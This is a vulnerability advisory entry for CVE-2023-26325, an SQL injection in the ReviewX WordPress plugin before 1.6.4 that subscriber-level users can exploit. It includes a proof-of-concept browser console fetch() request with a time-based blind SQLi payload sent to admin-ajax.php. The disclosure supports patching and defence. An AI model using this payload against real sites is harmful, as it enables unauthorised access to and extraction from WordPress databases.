Lucene search
WpvulndbWPEX-ID:BB5CC190-6291-4AF3-978B-0ADE2EA68D77HistoryFeb 23, 2023 - 12:00 a.m.
ReviewX < 1.6.4 - Subscriber+ SQLi
2023-02-2300:00:00
wpvulndb
208
reviewx plugin
sql injection
admin-ajax.php
web browser
developer console
subscriber user
EPSS
0.001
Percentile
33.0%
The plugin does not properly sanitise and escape the filterValue and selectedColumns parameters before using them in SQL statements via the rx_export_review AJAX action available to any authenticated users, leading to a SQL injection exploitable by users with a role as low as subscriber
Run the below command in the developer console of the web browser while being on the blog as subscriber user
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=rx_export_review&filterValue[6]=&filterValue[7]=id&selectedColumns[]=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));Related
wpvulndb
wpvulndb
ReviewX < 1.6.4 - Subscriber+ SQLi
2023-02-23 00:00:00
nvd
nvd
CVE-2023-26325
2023-02-23 20:15:14
cvelist
cvelist
CVE-2023-26325
2023-02-23 00:00:00
cve
cve
CVE-2023-26325
2023-02-23 20:15:14
openvas
openvas
WordPress ReviewX Plugin < 1.6.9 SQLi Vulnerability
2023-09-12 00:00:00
prion
prion
Sql injection
2023-02-23 20:15:00
wordfence
wordfence